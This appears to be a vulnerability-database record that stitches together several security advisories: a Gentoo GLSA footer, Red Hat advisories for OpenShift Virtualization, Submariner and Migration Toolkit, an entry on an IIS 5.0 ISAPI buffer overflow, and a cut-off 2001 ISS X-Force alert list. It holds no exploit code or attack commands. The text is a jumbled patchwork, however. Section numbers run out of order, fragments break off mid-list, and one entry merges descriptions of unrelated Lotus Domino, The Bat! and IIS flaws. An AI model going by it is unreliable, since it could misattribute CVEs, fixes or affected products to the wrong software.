=========== This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/202208-39 Concerns? ======== Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. License ====== Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: OpenShift Virtualization 4.11.1 security and bug fix update Advisory ID: RHSA-2022:8750-01 Product: cnv Advisory URL: https://access.redhat.com/errata/RHSA-2022:8750 Issue date: 2022-12-01 CVE Names: CVE-2015-20107 CVE-2016-3709 CVE-2020-0256 CVE-2020-35525 CVE-2020-35527 CVE-2021-0308 CVE-2021-38561 CVE-2022-0391 CVE-2022-0934 CVE-2022-1292 CVE-2022-1304 CVE-2022-1586 CVE-2022-1785 CVE-2022-1897 CVE-2022-1927 CVE-2022-2068 CVE-2022-2097 CVE-2022-2509 CVE-2022-3515 CVE-2022-22624 CVE-2022-22628 CVE-2022-22629 CVE-2022-22662 CVE-2022-24675 CVE-2022-24795 CVE-2022-24921 CVE-2022-25308 CVE-2022-25309 CVE-2022-25310 CVE-2022-26700 CVE-2022-26709 CVE-2022-26710 CVE-2022-26716 CVE-2022-26717 CVE-2022-26719 CVE-2022-27404 CVE-2022-27405 CVE-2022-27406 CVE-2022-28327 CVE-2022-29154 CVE-2022-30293 CVE-2022-30629 CVE-2022-30698 CVE-2022-30699 CVE-2022-32206 CVE-2022-32208 CVE-2022-34903 CVE-2022-37434 CVE-2022-38177 CVE-2022-38178 CVE-2022-40674 ==================================================================== 1. Summary: Red Hat OpenShift Virtualization release 4.11.1 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. Security Fix(es): * golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561) * golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675) * golang: regexp: stack exhaustion via a deeply nested expression (CVE-2022-24921) * golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327) * golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bug Fix(es): * Cloning a Block DV to VM with Filesystem with not big enough size comes to endless loop - using pvc api (BZ#2033191) * Restart of VM Pod causes SSH keys to be regenerated within VM (BZ#2087177) * Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR (BZ#2089391) * [4.11] VM Snapshot Restore hangs indefinitely when backed by a snapshotclass (BZ#2098225) * Fedora version in DataImportCrons is not 'latest' (BZ#2102694) * [4.11] Cloned VM's snapshot restore fails if the source VM disk is deleted (BZ#2109407) * CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls (BZ#2110562) * Nightly build: v4.11.0-578: index format was changed in 4.11 to file-based instead of sqlite-based (BZ#2112643) * Unable to start windows VMs on PSI setups (BZ#2115371) * [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24 (BZ#2128997) * Mark Windows 11 as TechPreview (BZ#2129013) * 4.11.1 rpms (BZ#2139453) This advisory contains the following OpenShift Virtualization 4.11.1 images. RHEL-8-CNV-4.11 virt-cdi-operator-container-v4.11.1-5 virt-cdi-uploadserver-container-v4.11.1-5 virt-cdi-apiserver-container-v4.11.1-5 virt-cdi-importer-container-v4.11.1-5 virt-cdi-controller-container-v4.11.1-5 virt-cdi-cloner-container-v4.11.1-5 virt-cdi-uploadproxy-container-v4.11.1-5 checkup-framework-container-v4.11.1-3 kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.1-7 kubevirt-tekton-tasks-create-datavolume-container-v4.11.1-7 kubevirt-template-validator-container-v4.11.1-4 virt-handler-container-v4.11.1-5 hostpath-provisioner-operator-container-v4.11.1-4 virt-api-container-v4.11.1-5 vm-network-latency-checkup-container-v4.11.1-3 cluster-network-addons-operator-container-v4.11.1-5 virtio-win-container-v4.11.1-4 virt-launcher-container-v4.11.1-5 ovs-cni-marker-container-v4.11.1-5 hyperconverged-cluster-webhook-container-v4.11.1-7 virt-controller-container-v4.11.1-5 virt-artifacts-server-container-v4.11.1-5 kubevirt-tekton-tasks-modify-vm-template-container-v4.11.1-7 kubevirt-tekton-tasks-disk-virt-customize-container-v4.11.1-7 libguestfs-tools-container-v4.11.1-5 hostpath-provisioner-container-v4.11.1-4 kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.1-7 kubevirt-tekton-tasks-copy-template-container-v4.11.1-7 cnv-containernetworking-plugins-container-v4.11.1-5 bridge-marker-container-v4.11.1-5 virt-operator-container-v4.11.1-5 hostpath-csi-driver-container-v4.11.1-4 kubevirt-tekton-tasks-create-vm-from-template-container-v4.11.1-7 kubemacpool-container-v4.11.1-5 hyperconverged-cluster-operator-container-v4.11.1-7 kubevirt-ssp-operator-container-v4.11.1-4 ovs-cni-plugin-container-v4.11.1-5 kubevirt-tekton-tasks-cleanup-vm-container-v4.11.1-7 kubevirt-tekton-tasks-operator-container-v4.11.1-2 cnv-must-gather-container-v4.11.1-8 kubevirt-console-plugin-container-v4.11.1-9 hco-bundle-registry-container-v4.11.1-49 3. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258 4. Bugs fixed (https://bugzilla.redhat.com/): 2033191 - Cloning a Block DV to VM with Filesystem with not big enough size comes to endless loop - using pvc api 2064857 - CVE-2022-24921 golang: regexp: stack exhaustion via a deeply nested expression 2070772 - When specifying pciAddress for several SR-IOV NIC they are not correctly propagated to libvirt XML 2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode 2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar 2087177 - Restart of VM Pod causes SSH keys to be regenerated within VM 2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR 2091856 - ?Edit BootSource? action should have more explicit information when disabled 2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add 2098225 - [4.11] VM Snapshot Restore hangs indefinitely when backed by a snapshotclass 2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS 2102694 - Fedora version in DataImportCrons is not 'latest' 2109407 - [4.11] Cloned VM's snapshot restore fails if the source VM disk is deleted 2110562 - CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls 2112643 - Nightly build: v4.11.0-578: index format was changed in 4.11 to file-based instead of sqlite-based 2115371 - Unable to start windows VMs on PSI setups 2119613 - GiB changes to B in Template's Edit boot source reference modal 2128554 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass 2128872 - [4.11]Can't restore cloned VM 2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24 2129013 - Mark Windows 11 as TechPreview 2129235 - [RFE] Add "Copy SSH command" to VM action list 2134668 - Cannot edit ssh even vm is stopped 2139453 - 4.11.1 rpms 5. References: https://access.redhat.com/security/cve/CVE-2015-20107 https://access.redhat.com/security/cve/CVE-2016-3709 https://access.redhat.com/security/cve/CVE-2020-0256 https://access.redhat.com/security/cve/CVE-2020-35525 https://access.redhat.com/security/cve/CVE-2020-35527 https://access.redhat.com/security/cve/CVE-2021-0308 https://access.redhat.com/security/cve/CVE-2021-38561 https://access.redhat.com/security/cve/CVE-2022-0391 https://access.redhat.com/security/cve/CVE-2022-0934 https://access.redhat.com/security/cve/CVE-2022-1292 https://access.redhat.com/security/cve/CVE-2022-1304 https://access.redhat.com/security/cve/CVE-2022-1586 https://access.redhat.com/security/cve/CVE-2022-1785 https://access.redhat.com/security/cve/CVE-2022-1897 https://access.redhat.com/security/cve/CVE-2022-1927 https://access.redhat.com/security/cve/CVE-2022-2068 https://access.redhat.com/security/cve/CVE-2022-2097 https://access.redhat.com/security/cve/CVE-2022-2509 https://access.redhat.com/security/cve/CVE-2022-3515 https://access.redhat.com/security/cve/CVE-2022-22624 https://access.redhat.com/security/cve/CVE-2022-22628 https://access.redhat.com/security/cve/CVE-2022-22629 https://access.redhat.com/security/cve/CVE-2022-22662 https://access.redhat.com/security/cve/CVE-2022-24675 https://access.redhat.com/security/cve/CVE-2022-24795 https://access.redhat.com/security/cve/CVE-2022-24921 https://access.redhat.com/security/cve/CVE-2022-25308 https://access.redhat.com/security/cve/CVE-2022-25309 https://access.redhat.com/security/cve/CVE-2022-25310 https://access.redhat.com/security/cve/CVE-2022-26700 https://access.redhat.com/security/cve/CVE-2022-26709 https://access.redhat.com/security/cve/CVE-2022-26710 https://access.redhat.com/security/cve/CVE-2022-26716 https://access.redhat.com/security/cve/CVE-2022-26717 https://access.redhat.com/security/cve/CVE-2022-26719 https://access.redhat.com/security/cve/CVE-2022-27404 https://access.redhat.com/security/cve/CVE-2022-27405 https://access.redhat.com/security/cve/CVE-2022-27406 https://access.redhat.com/security/cve/CVE-2022-28327 https://access.redhat.com/security/cve/CVE-2022-29154 https://access.redhat.com/security/cve/CVE-2022-30293 https://access.redhat.com/security/cve/CVE-2022-30629 https://access.redhat.com/security/cve/CVE-2022-30698 https://access.redhat.com/security/cve/CVE-2022-30699 https://access.redhat.com/security/cve/CVE-2022-32206 https://access.redhat.com/security/cve/CVE-2022-32208 https://access.redhat.com/security/cve/CVE-2022-34903 https://access.redhat.com/security/cve/CVE-2022-37434 https://access.redhat.com/security/cve/CVE-2022-38177 https://access.redhat.com/security/cve/CVE-2022-38178 https://access.redhat.com/security/cve/CVE-2022-40674 https://access.redhat.com/security/updates/classification/#moderate 6. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBY4lNCdzjgjWX9erEAQhXxhAAjaag4e7jIpQLpc0kJhc/hn59M4UIxn8v a1L+lD58IrBfY3KAtSAK0t3ei92Lyf8LCJqm027yGlIskeCV91vkO9ZpJhPfRasU u1a8Uhd/5F6caB0xUPX26vyCyksalw17CNmLWh5wd2izhkOGctkgVD7LhsVzXbFh tIomeVp/hVwW9ILX03ijss27E6m2ZUczgWmuNpviqW8WRFMUw3ZM+1MxnSDHxURe H28dsj2l7nrshdBGrZeuj2HBoA0/x3Vsc2jiXfP8nt7LcQ/pb1DN4MYo6lAAEVkC O2LlzTAzw/3MAGofaRinyHZD2aoqicPqooUIQglBbF6cvYAUrMtxRCwKcZOckE3d F2exKjihBY3JeLlsjpWXBe0yAhdwse7j0oovNL2uQH1imUr7Y1pXVlJqeDzHkzME MIRKzuuTGJe1D9Av4S8R+W5eT7iXBAH7x9Lia1NFxeflemVQbyr8ayEMLcmiDuyj xMKYFFpW9GmplZlCnDaG5lxKu8ZbOkRzanaLeLn+G5j1+1w9Y9wGtlXJIHV6gmfC Wk33MBCpqCGg1Wz+SlXJCtksnYmvKdzn79b2HInvPJtndDQ/VidcN2MuJfkYe688 2m3FYMI0ehPummvv3iGXLz5ku6gD6y0qNhNWC6HM+hLNnPvvukXXcFgCyonJuv0I AqwDoKa8myM=pIHc -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . This release includes security and bug fixes, and enhancements. Bugs fixed (https://bugzilla.redhat.com/): 2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY 2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers 2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters 2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps 2154755 - Release of OpenShift Serverless Eventing 1.27.0 2154757 - Release of OpenShift Serverless Serving 1.27.0 5. Description: Submariner enables direct networking between pods and services on different Kubernetes clusters that are either on-premises or in the cloud. For more information about Submariner, see the Submariner open source community website at: https://submariner.io/. Security fixes: * CVE-2022-32149 golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time to parse complex tags Bugs addressed: * Build Submariner 0.13.3 (ACM-2226) * Verify Submariner with OCP 4.12 (ACM-2435) * Submariner does not support cluster "kube-proxy ipvs mode" (ACM-2821) 3. Bugs fixed (https://bugzilla.redhat.com/): 2134010 - CVE-2022-32149 golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time to parse complex tags 5. JIRA issues fixed (https://issues.jboss.org/): ACM-2226 - [ACM 2.6.4] Build Submariner 0.13.3 ACM-2435 - [ACM 2.6.4] Verify Submariner with OCP 4.12 ACM-2821 - [Submariner] - 0.13.3 - Submariner does not support cluster "kube-proxy ipvs mode" 6. Summary: An update is now available for Migration Toolkit for Runtimes (v1.0.1). Bugs fixed (https://bugzilla.redhat.com/): 2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing 5. Description: Migration Toolkit for Applications 6.0.1 Images Security Fix(es) from Bugzilla: * loader-utils: prototype pollution in function parseQuery in parseQuery.js (CVE-2022-37601) * Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing (CVE-2022-42920) * gin: Unsanitized input in the default logger in github.com/gin-gonic/gin (CVE-2020-36567) * glob-parent: Regular Expression Denial of Service (CVE-2021-35065) * express: "qs" prototype poisoning causes the hang of the node process (CVE-2022-24999) * loader-utils:Regular expression denial of service (CVE-2022-37603) * golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests (CVE-2022-41717) * json5: Prototype Pollution in JSON5 via Parse Method (CVE-2022-46175) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/): 2134876 - CVE-2022-37601 loader-utils: prototype pollution in function parseQuery in parseQuery.js 2140597 - CVE-2022-37603 loader-utils:Regular expression denial of service 2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing 2150323 - CVE-2022-24999 express: "qs" prototype poisoning causes the hang of the node process 2156263 - CVE-2022-46175 json5: Prototype Pollution in JSON5 via Parse Method 2156324 - CVE-2021-35065 glob-parent: Regular Expression Denial of Service 2156683 - CVE-2020-36567 gin: Unsanitized input in the default logger in github.com/gin-gonic/gin 2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests 5. JIRA issues fixed (https://issues.jboss.org/): MTA-103 - MTA 6.0.1 Installation failed with CrashLoop Error for UI Pod MTA-106 - Implement ability for windup addon image pull policy to be configurable MTA-122 - MTA is upgrading automatically ignoring 'Manual' setting MTA-123 - MTA Becomes unusable when running bulk binary analysis MTA-127 - After upgrading MTA operator from 6.0.0 to 6.0.1 and running analysis , task pods starts failing MTA-131 - Analysis stops working after MTA upgrade from 6.0.0 to 6.0.1 MTA-36 - Can't disable a proxy if it has an invalid configuration MTA-44 - Make RWX volumes optional. MTA-49 - Uploaded a local binary when return back to the page the UI should show green bar and correct % MTA-59 - Getting error 401 if deleting many credentials quickly MTA-65 - Set windup addon image pull policy to be controlled by the global image_pull_policy parameter MTA-72 - CVE-2022-46175 mta-ui-container: json5: Prototype Pollution in JSON5 via Parse Method [mta-6] MTA-73 - CVE-2022-37601 mta-ui-container: loader-utils: prototype pollution in function parseQuery in parseQuery.js [mta-6] MTA-74 - CVE-2020-36567 mta-windup-addon-container: gin: Unsanitized input in the default logger in github.com/gin-gonic/gin [mta-6] MTA-76 - CVE-2022-37603 mta-ui-container: loader-utils:Regular expression denial of service [mta-6] MTA-77 - CVE-2020-36567 mta-hub-container: gin: Unsanitized input in the default logger in github.com/gin-gonic/gin [mta-6] MTA-80 - CVE-2021-35065 mta-ui-container: glob-parent: Regular Expression Denial of Service [mta-6] MTA-82 - CVE-2022-42920 org.jboss.windup-windup-cli-parent: Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing [mta-6.0] MTA-85 - CVE-2022-24999 mta-ui-container: express: "qs" prototype poisoning causes the hang of the node process [mta-6] MTA-88 - CVE-2020-36567 mta-admin-addon-container: gin: Unsanitized input in the default logger in github.com/gin-gonic/gin [mta-6] MTA-92 - CVE-2022-42920 org.jboss.windup.plugin-windup-maven-plugin-parent: Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing [mta-6.0] MTA-96 - [UI] Maven -> "Local artifact repository" textbox can be checked and has no tooltip 6
var-200106-0035 Buffer overflow in Internet Printing ISAPI extension in Windows 2000 allows remote attackers to gain root privileges via a long print request that is passed to the extension through IIS 5.0. A vulnerability exists in Microsoft IIS 5.0 running on Windows 2000 that allows a remote intruder to run arbitrary code on the victim machine. The Lotus Domino Web Server contains a flaw that could be exploited to cause a denial of service. Due to a problem parsing carriage return/line feeds in RFC822 format mail messages, The Bat! mail client may permaturely detect the end of a mail message, causing an error to occur. This error may prevent the mail user from retrieving other mail messages until the message with the error is removed. Microsoft Windows of ISAPI An extension contains a buffer overflow vulnerability because a part of the code that processes input parameters contains a buffer that is not checked for upper bounds.Local System Arbitrary code may be executed with the privileges of. If numerous requests are made for MS DOS device names, ncgihttp.exe inappropriately handles them, resulting in the exhaustion of system resources. -----BEGIN PGP SIGNED MESSAGE----- Internet Security Systems Security Alert Summary May 10, 2001 Volume 6 Number 6 X-Force Vulnerability and Threat Database: http://xforce.iss.net/ To receive these Alert Summaries as well as other Alerts and Advisories, subscribe to the Internet Security Systems Alert mailing list at: http://xforce.iss.net/maillists/index.php This summary can be found at: http://xforce.iss.net/alerts/vol-6_num-6.php _____ Contents: * 120 Reported Vulnerabilities * Risk Factor Key _____ Date Reported: 04/02/2001 Brief Description: The Bat! masked file type in email attachment could allow execution of code Risk Factor: Low Attack Type: Host Based / Network Based Platforms Affected: The Bat! 1.49 and earlier Vulnerability: thebat-masked-file-type X-Force URL: http://xforce.iss.net/static/6324.php Date Reported: 04/02/2001 Brief Description: PHP-Nuke could allow attackers to redirect ad banner URL links Risk Factor: Medium Attack Type: Network Based Platforms Affected: PHP-Nuke 4.4 and earlier Vulnerability: php-nuke-url-redirect X-Force URL: http://xforce.iss.net/static/6342.php Date Reported: 04/03/2001 Brief Description: Orinoco RG-1000 Residential Gateway default SSID reveals WEP encryption key Risk Factor: Low Attack Type: Host Based / Network Based Platforms Affected: Orinoco Residential Gateway RG-1000 Vulnerability: orinoco-rg1000-wep-key X-Force URL: http://xforce.iss.net/static/6328.php Date Reported: 04/03/2001 Brief Description: Navision Financials server denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: Navision Financials 2.5 and 2.6 Vulnerability: navision-server-dos X-Force URL: http://xforce.iss.net/static/6318.php Date Reported: 04/03/2001 Brief Description: uStorekeeper online shopping system allows remote file retrieval Risk Factor: Medium Attack Type: Network Based Platforms Affected: uStorekeeper 1.61 Vulnerability: ustorekeeper-retrieve-files X-Force URL: http://xforce.iss.net/static/6319.php Date Reported: 04/03/2001 Brief Description: Resin server allows remote attackers to view Javabean files Risk Factor: Medium Attack Type: Network Based Platforms Affected: Resin 1.2.x, Resin 1.3b1 Vulnerability: resin-view-javabean X-Force URL: http://xforce.iss.net/static/6320.php Date Reported: 04/03/2001 Brief Description: BPFTP could allow attackers to obtain login credentials Risk Factor: High Attack Type: Network Based Platforms Affected: BPFTP 2.0 Vulnerability: bpftp-obtain-credentials X-Force URL: http://xforce.iss.net/static/6330.php Date Reported: 04/04/2001 Brief Description: Ntpd server readvar control message buffer overflow Risk Factor: Low Attack Type: Host Based / Network Based Platforms Affected: SCO Openserver 5.0.0 to 5.0.6, AIX 5.1, Slackware Linux 7.1, Engarde Secure Linux 1.0.1, Progeny Linux, SuSE Linux 7.1, ntpd 4.0.99k and earlier, FreeBSD 4.2-Stable, Mandrake Linux Corporate Server 1.0.1, Mandrake Linux 7.2, Trustix Secure Linux, Immunix Linux 7.0, NetBSD 1.5, SuSE Linux 7.0, Caldera OpenLinux eServer 2.3.1 Vulnerability: ntpd-remote-bo X-Force URL: http://xforce.iss.net/static/6321.php Date Reported: 04/04/2001 Brief Description: Cisco CSS debug mode allows users to gain administrative access Risk Factor: Low Attack Type: Host Based / Network Based Platforms Affected: Cisco Content Services Switch 11050, Cisco Content Services Switch 11150, Cisco Content Services Switch 11800 Vulnerability: cisco-css-elevate-privileges X-Force URL: http://xforce.iss.net/static/6322.php Date Reported: 04/04/2001 Brief Description: BEA Tuxedo may allow access to remote services Risk Factor: Medium Attack Type: Network Based Platforms Affected: BEA Tuxedo 7.1 Vulnerability: bea-tuxedo-remote-access X-Force URL: http://xforce.iss.net/static/6326.php Date Reported: 04/05/2001 Brief Description: Ultimate Bulletin Board could allow attackers to bypass authentication Risk Factor: High Attack Type: Network Based Platforms Affected: Ultimate Bulletin Board 5.43, Ultimate Bulletin Board 5.4.7e Vulnerability: ultimatebb-bypass-authentication X-Force URL: http://xforce.iss.net/static/6339.php Date Reported: 04/05/2001 Brief Description: BinTec X4000 NMAP denial of service Risk Factor: Low Attack Type: Network Based Platforms Affected: BinTec X4000 5.1.6P10 and prior, BinTec X1000, BinTec X1200 Vulnerability: bintec-x4000-nmap-dos X-Force URL: http://xforce.iss.net/static/6323.php Date Reported: 04/05/2001 Brief Description: WatchGuard Firebox II kernel denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: WatchGuard Firebox II prior to 4.6 Vulnerability: firebox-kernel-dos X-Force URL: http://xforce.iss.net/static/6327.php Date Reported: 04/06/2001 Brief Description: Cisco PIX denial of service due to multiple TACACS+ requests Risk Factor: Medium Attack Type: Network Based Platforms Affected: Cisco PIX Firewall 5.1.4 Vulnerability: cisco-pix-tacacs-dos X-Force URL: http://xforce.iss.net/static/6353.php Date Reported: 04/06/2001 Brief Description: Darren Reed's IP Filter allows attackers to access UDP and TCP ports Risk Factor: Medium Attack Type: Network Based Platforms Affected: IP Filter 3.4.16 Vulnerability: ipfilter-access-ports X-Force URL: http://xforce.iss.net/static/6331.php Date Reported: 04/06/2001 Brief Description: Veritas NetBackup nc (netcat) command denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: NetBackup 3.2 Vulnerability: veritas-netbackup-nc-dos X-Force URL: http://xforce.iss.net/static/6329.php Date Reported: 04/08/2001 Brief Description: PGP may allow malicious users to access authenticated split keys Risk Factor: Medium Attack Type: Host Based Platforms Affected: PGP 7.0 Vulnerability: nai-pgp-split-keys X-Force URL: http://xforce.iss.net/static/6341.php Date Reported: 04/09/2001 Brief Description: Solaris kcms_configure command line buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: Solaris 7, Solaris 8 Vulnerability: solaris-kcms-command-bo X-Force URL: http://xforce.iss.net/static/6359.php Date Reported: 04/09/2001 Brief Description: TalkBack CGI script could allow remote attackers to read files on the Web server Risk Factor: Medium Attack Type: Network Based Platforms Affected: TalkBack prior to 1.2 Vulnerability: talkback-cgi-read-files X-Force URL: http://xforce.iss.net/static/6340.php Date Reported: 04/09/2001 Brief Description: Multiple FTP glob(3) implementation Risk Factor: Low Attack Type: Network Based Platforms Affected: FreeBSD 4.2, Solaris 8, IRIX 6.5.x, OpenBSD 2.8, HP-UX 11.00, NetBSD Vulnerability: ftp-glob-implementation X-Force URL: http://xforce.iss.net/static/6333.php Date Reported: 04/09/2001 Brief Description: Pine mail client temp file symbolic link Risk Factor: Medium Attack Type: Host Based Platforms Affected: Pine prior to 4.33, Red Hat Linux 5.2, Red Hat Linux 6.2, Red Hat Linux 7.0 Vulnerability: pine-tmp-file-symlink X-Force URL: http://xforce.iss.net/static/6367.php Date Reported: 04/09/2001 Brief Description: Multiple FTP glob(3) expansion Risk Factor: Low Attack Type: Network Based Platforms Affected: HP-UX 11.00, NetBSD, Solaris 8, IRIX 6.5.x, OpenBSD 2.8, FreeBSD 4.2, MIT Kerberos 5 Vulnerability: ftp-glob-expansion X-Force URL: http://xforce.iss.net/static/6332.php Date Reported: 04/09/2001 Brief Description: Netscape embedded JavaScript in GIF file comments can be used to access remote data Risk Factor: Medium Attack Type: Host Based / Network Based Platforms Affected: Netscape Communicator 4.76, Red Hat Linux 6.2, Debian Linux 2.2, Conectiva Linux, Red Hat Linux 7.0, Immunix Linux 6.2, Immunix Linux 7.0 Beta, Red Hat Linux 7.1 Vulnerability: netscape-javascript-access-data X-Force URL: http://xforce.iss.net/static/6344.php Date Reported: 04/09/2001 Brief Description: STRIP generates weak passwords Risk Factor: Low Attack Type: Host Based Platforms Affected: STRIP 0.5 and earlier Vulnerability: strip-weak-passwords X-Force URL: http://xforce.iss.net/static/6362.php Date Reported: 04/10/2001 Brief Description: Solaris Xsun HOME environment variable buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: Solaris 7 Vulnerability: solaris-xsun-home-bo X-Force URL: http://xforce.iss.net/static/6343.php Date Reported: 04/10/2001 Brief Description: Compaq Presario Active X denial of service Risk Factor: Low Attack Type: Network Based Platforms Affected: Compaq Presario, Windows 98, Windows ME Vulnerability: compaq-activex-dos X-Force URL: http://xforce.iss.net/static/6355.php Date Reported: 04/10/2001 Brief Description: Alcatel ADSL modems 'EXPERT' account Risk Factor: Low Attack Type: Host Based / Network Based Platforms Affected: Alcatel ADSL Network Termination Device 1000, Alcatel Speed Touch ADSL modem Home Vulnerability: alcatel-expert-account X-Force URL: http://xforce.iss.net/static/6354.php Date Reported: 04/10/2001 Brief Description: Alcatel ADSL modems allow attacker on LAN to gain access using TFTP Risk Factor: Low Attack Type: Host Based / Network Based Platforms Affected: Alcatel ADSL Network Termination Device 1000, Alcatel Speed Touch ADSL modem Home Vulnerability: alcatel-tftp-lan-access X-Force URL: http://xforce.iss.net/static/6336.php Date Reported: 04/10/2001 Brief Description: Alcatel ADSL modems allow attacker on WAN to gain access using TFTP Risk Factor: Low Attack Type: Network Based Platforms Affected: Alcatel ADSL Network Termination Device 1000, Alcatel Speed Touch ADSL modem Home Vulnerability: alcatel-tftp-wan-access X-Force URL: http://xforce.iss.net/static/6337.php Date Reported: 04/10/2001 Brief Description: Oracle Application Server shared library (ndwfn4.so) buffer overflow Risk Factor: Low Attack Type: Network Based Platforms Affected: iPlanet Web Server 4.x, Oracle Application Server 4.0.8.2 Vulnerability: oracle-appserver-ndwfn4-bo X-Force URL: http://xforce.iss.net/static/6334.php Date Reported: 04/10/2001 Brief Description: Alcatel ADSL modems use blank password by default Risk Factor: Low Attack Type: Host Based / Network Based Platforms Affected: Alcatel ADSL Network Termination Device 1000, Alcatel Speed Touch ADSL modem Home Vulnerability: alcatel-blank-password X-Force URL: http://xforce.iss.net/static/6335.php Date Reported: 04/11/2001 Brief Description: Solaris dtsession buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: Solaris 7 Vulnerability: solaris-dtsession-bo X-Force URL: http://xforce.iss.net/static/6366.php Date Reported: 04/11/2001 Brief Description: Solaris kcsSUNWIOsolf.so buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: Solaris 7, Solaris 8 Vulnerability: solaris-kcssunwiosolf-bo X-Force URL: http://xforce.iss.net/static/6365.php Date Reported: 04/11/2001 Brief Description: Lightwave ConsoleServer brute force password attack Risk Factor: High Attack Type: Network Based Platforms Affected: Lightwave ConsoleServer 3200 Vulnerability: lightwave-consoleserver-brute-force X-Force URL: http://xforce.iss.net/static/6345.php Date Reported: 04/11/2001 Brief Description: nph-maillist allows user to execute code Risk Factor: Low Attack Type: Host Based Platforms Affected: Email List Generator 3.5 and earlier Vulnerability: nph-maillist-execute-code X-Force URL: http://xforce.iss.net/static/6363.php Date Reported: 04/11/2001 Brief Description: Symantec Ghost Configuration Server denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: Ghost 6.5 Vulnerability: ghost-configuration-server-dos X-Force URL: http://xforce.iss.net/static/6357.php Date Reported: 04/11/2001 Brief Description: Lotus Domino Web Server DOS device denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: Lotus Domino R5 prior to 5.0.7 Vulnerability: lotus-domino-device-dos X-Force URL: http://xforce.iss.net/static/6348.php Date Reported: 04/11/2001 Brief Description: Lotus Domino Web Server HTTP header denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: Lotus Domino R5 prior to 5.0.7 Vulnerability: lotus-domino-header-dos X-Force URL: http://xforce.iss.net/static/6347.php Date Reported: 04/11/2001 Brief Description: Lotus Domino Web Server URL parsing denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: Lotus Domino R5 prior to 5.0.7 Vulnerability: lotus-domino-url-dos X-Force URL: http://xforce.iss.net/static/6351.php Date Reported: 04/11/2001 Brief Description: Lotus Domino Web Server CORBA denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: Lotus Domino R5 prior to 5.0.7 Vulnerability: lotus-domino-corba-dos X-Force URL: http://xforce.iss.net/static/6350.php Date Reported: 04/11/2001 Brief Description: Symantec Ghost database engine denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: Ghost 6.5, Sybase Adaptive Server Database Engine 6.0.3.2747 Vulnerability: ghost-database-engine-dos X-Force URL: http://xforce.iss.net/static/6356.php Date Reported: 04/11/2001 Brief Description: cfingerd daemon remote format string Risk Factor: Low Attack Type: Network Based Platforms Affected: Debian Linux 2.1, Debian Linux 2.2, cfingerd 1.4.3 and earlier Vulnerability: cfingerd-remote-format-string X-Force URL: http://xforce.iss.net/static/6364.php Date Reported: 04/11/2001 Brief Description: Lotus Domino Web Server Unicode denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: 